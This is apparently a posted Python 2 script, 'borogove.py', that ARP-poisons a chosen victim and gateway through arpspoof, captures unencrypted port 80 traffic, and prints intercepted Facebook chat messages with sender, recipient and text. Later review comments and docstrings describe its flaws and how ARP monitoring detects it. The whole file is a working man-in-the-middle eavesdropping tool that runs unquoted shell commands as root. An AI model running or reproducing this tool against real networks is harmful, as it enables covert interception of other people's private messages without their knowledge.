moften

borogove.py Sniffer chat facebook

Jan 4th, 2012
  1. #!/usr/bin/env python
  2.  
  3. """ 2011 vdo.pure at gmail.com """
  4.  
  5. """
  6.    This program is free software: you can redistribute it and/or modify
  7.    it under the terms of the GNU General Public License as published by
  8.    the Free Software Foundation, either version 3 of the License, or
  9.    (at your option) any later version.
  10.  
  11.    This program is distributed in the hope that it will be useful,
  12.    but WITHOUT ANY WARRANTY; without even the implied warranty of
  13.    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  14.    GNU General Public License for more details.
  15.  
  16.    You should have received a copy of the GNU General Public License
  17.    along with this program.  If not, see <http://www.gnu.org/licenses/>.
  18. """
  19. import sys, os
  20. import dpkt, pcap
  21.  
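  def check_root():
      """Return True when the process runs with effective UID 0, False otherwise.

      The effective UID is checked instead of the LOGNAME environment
      variable. An environment variable is set by the caller and may be
      missing, stale or set to any value, so it does not describe the
      privileges the process actually holds.
      """
      return os.geteuid() == 0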
  27.  
  def poison(iface, victim, gw):
      """Enable IPv4 forwarding and launch arpspoof in both directions.

      Issues three shell commands through os.system: one sysctl write and
      two backgrounded arpspoof processes (victim told about gw, gw told
      about victim), each with stderr discarded. Exit statuses are ignored,
      so a missing binary or a rejected sysctl write is not reported.

      Args:
          iface: interface name handed to ``arpspoof -i``.
          victim: address of the first host.
          gw: address of the second host (the gateway in the usage text).

      NOTE(review): the arguments are joined into a shell command line
      without quoting, so shell metacharacters in them are interpreted by
      the shell. The backgrounded processes are neither tracked nor stopped
      by this function.
      """
      os.system("sysctl -w .net.ipv4.ip_forward=1 > /dev/null")

      # For whoever monitors the segment: this stage appears as unsolicited
      # ARP replies that rebind a peer's IP to another MAC. ARP monitoring or
      # switch-level ARP inspection is where it is normally caught.
      for target, claimed in ((victim, gw), (gw, victim)):
          command = " ".join(
              ["arpspoof -i", iface, "-t", target, claimed, "2> /dev/null &"]
          )
          os.system(command)

      print("ARP cache poisoning...")
  35.  
  36.  
  def fbchatgrep(p, pid):
      """Print one chat message found in a captured frame and return its id.

      The frame's ``data`` is stringified and searched for a JSON-like chat
      fragment. When one is found and its message id differs from ``pid``,
      the sender, recipient and text are printed and the new id is returned.
      Otherwise ``pid`` is returned unchanged.

      Args:
          p: object whose ``data`` attribute holds the captured payload.
          pid: id of the last message printed, used to skip duplicates.

      Returns:
          The id of the message just printed, or ``pid`` when nothing new
          was printed.

      NOTE(review): the payload can only be matched when it is plain text.
      The field boundaries come from fixed find()/rfind() offsets, not a
      JSON parser, so a payload with a different field order gives
      arbitrary slices.
      """
      payload = str(p.data)

      def _between(start, skip, end, end_shift=0):
          # Same find()/rfind() arithmetic as the inline slices it replaces,
          # including the -1 returned when a marker is absent.
          return payload[payload.find(start) + skip:payload.rfind(end) + end_shift]

      # NOTE(review): the original test was written as
      # `("{\"t\":\"msg") and ("\"type\":\"msg\"") in data`. A non-empty string
      # literal is always truthy, so only the second marker was ever checked.
      # That behaviour is kept here.
      if '"type":"msg"' not in payload:
          return pid

      msgid = _between('"msgID":', 9, '"},"from":')
      if msgid == pid:
          # Same message seen again (the capture sees forwarded copies).
          return pid

      lines = (
          "Message From: " + _between('from_name":"', 12, '","from_first_name'),
          "To: " + _between('to_name":"', 10, '","to_first_name'),
          _between('"text":', 8, ',"time"', -1),
      )

      print(" ")
      for line in lines:
          # `unicode` exists only in Python 2, which this script targets.
          print(unicode(line, 'unicode_escape').encode('utf-8'))
      print(" ")
      return msgid
  52.        
  if __name__ == '__main__':
      # Expected arguments: <interface> <target> <gateway>.
      if len(sys.argv) < 4:
          print('usage: sniff.py <interface> <target> <gateway>')
          sys.exit(0)
      if not check_root():
          print('Must be run as root.')
          sys.exit(1)

      iface, target, gateway = sys.argv[1:4]

      # Placeholder "previous message id" that no real id is expected to equal.
      last_msgid = "fo bar"
      capture = pcap.pcap(iface)
      # Only TCP port 80 is inspected, so traffic carried over TLS is never
      # handed to the parser.
      capture.setfilter('tcp and port 80')

      try:
          print('listening on %s' % (capture.name))
          print('to exit, type Control-c')
          poison(iface, target, gateway)
          for _ts, frame in capture:
              last_msgid = fbchatgrep(dpkt.ethernet.Ethernet(frame), last_msgid)

      except KeyboardInterrupt:
          # NOTE(review): this is the only cleanup path. It sets ip_forward to 0
          # whatever the value was before the run, and it does not stop the
          # arpspoof processes that poison() put in the background. Both are
          # host state an investigator can still find afterwards.
          os.system("sysctl -w .net.ipv4.ip_forward=0 > /dev/null")
          received, dropped, _if_dropped = capture.stats()
          print('\n%d packets received by filter' % received)
          print('%d packets dropped by kernel' % dropped)